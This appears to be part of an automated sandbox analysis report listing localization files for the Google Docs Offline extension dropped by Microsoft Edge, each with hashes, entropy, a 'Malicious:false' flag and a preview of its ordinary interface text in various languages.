                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1031
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1613
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                  MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                  SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                  SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                  SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                  MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                  SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                  SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                  SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                  MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                  SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                  SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                  SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):848
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                  MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                  SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                  SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                  SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1425
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                  MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                  SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                  SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                  SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):961
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                  MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                  SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                  SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                  SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):959
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                  MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                  SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                  SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                  SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):968
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                  MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                  SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                  SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                  SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):838
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                  MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                  SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                  SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                  SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1305
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                  MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                  SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                  SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                  SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):911
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                  MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                  SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                  SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                  SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):939
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                  MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                  SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                  SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                  SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):977
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):972
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):990
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1658
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1672
